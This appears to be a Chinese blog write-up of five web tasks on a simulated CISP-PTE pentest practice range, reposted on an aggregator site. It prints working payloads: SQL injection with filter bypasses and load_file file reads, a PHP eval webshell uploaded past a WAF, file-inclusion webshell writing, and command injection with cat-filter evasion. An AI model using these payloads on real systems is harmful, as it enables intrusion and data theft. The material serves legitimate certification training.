IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> CISP-PTE认证实操模拟题分享 -> 正文阅读

[PHP知识库]CISP-PTE认证实操模拟题分享

CSIP-PTE安全认证实操题有五道web题,一道综合题,这篇文章只分享5道web题,此靶场为模拟靶场。

SQL注入

通过页面提示,我们要利用sql注入读取/tmp/360/key文件,读取的话就要用到load_file命令来去获取文件信息
在这里插入图片描述

通过测试得知,该传值方式为POST方式传值,这里也可以看到返回的sql语句。
在这里插入图片描述输入id=1’) and 1#,发现返回的sql语句过滤了空格。
在这里插入图片描述
将空格用/**/代替,值正常返回在这里插入图片描述构造sql语句,查看有多少个显示位,当显示位为5时,则页面不显示数据,所以有4个显示位。

id=1')/**/order/**/by/**/5#

在这里插入图片描述通过联合查询来获取显示位,发现union被过滤

id=-1')/**/union/**/select/**/1,2,3,4#

pcnJ5,size_20,color_FFFFFF,t_70,g_se,x_16)
尝试双写union来绕过

id=-1')/**/ununionion/**/select/**/1,2,3,4#

在这里插入图片描述利用load_file来获取flag值

id=-1')/**/ununionion/**/select/**/1,2,3,load_file('/tmp/360/key')#

在这里插入图片描述

文件上传

通过提示得知,需要绕过waf才能上传文件至服务器,flag在/key.php中。
在这里插入图片描述先编写一句话木马,将一句话木马保存在eval.php中

<?php @eval($_POST[shell])?>

通过burp去重放去修改,尝试绕过waf。
在这里插入图片描述将文件后缀名修改成pht,将文件类型修改成image/gif 添加文件头GIF89a,点击发送在这里插入图片描述可以看到上传成功,利用中国蚁剑连接。
在这里插入图片描述查看key.php文件
在这里插入图片描述

文件包含

在这里插入图片描述通过url可以得知是GET传值,可以利用伪协议写入一句话木马在这里插入图片描述<?php $a = fopen('./1.php','w'); fwrite($a,'<?php eval($_POST[shell])?>'); fclose($a); ?>
在这里插入图片描述连接成功
在这里插入图片描述得到flag
在这里插入图片描述

命令执行

在这里插入图片描述在输入框内依次输入’$,$$,|,||,;'看哪些被过滤了
发现都没过滤,我个人喜欢用‘;’,所以下列情况则是通过‘;’来测试。
输入;find / -name "key.php"
在这里插入图片描述找到key.php的路径,那么只需要通过cat去看key.php内容即可

;cat /app/key.php

在这里插入图片描述cat被过滤了,那么用另外的方式去查看该文件

;grep '' /app/key.php

在这里插入图片描述出来了一句话,但没有完全显示
F12查看代码,得到flag
在这里插入图片描述

日志分析

通过提示,我们应该重点关注IP为172.16.12.12的操作,将日志文件下载下来,具体分析。
在这里插入图片描述首先筛选出IP,ctrl+f打开查找,输入IP,点击在当前文件中查找
在这里插入图片描述就会得到下列的搜索结果,再将其过滤一遍,只搜索返回值为200的数据。
在这里插入图片描述右键点击在此搜索结果中查找数据
在这里插入图片描述搜索关键字:200
在这里插入图片描述可以看到这里有个疑似是管理后台的url
在这里插入图片描述在浏览器将其打开
在这里插入图片描述利用爆破尝试爆破账号,密码
在这里插入图片描述发现账号:admin 密码:password123页面状态码为302,可能发生跳转
在这里插入图片描述
尝试登录,得到flag
在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-12-03 12:50:46  更:2021-12-03 12:50:51 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/14 14:49:37-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码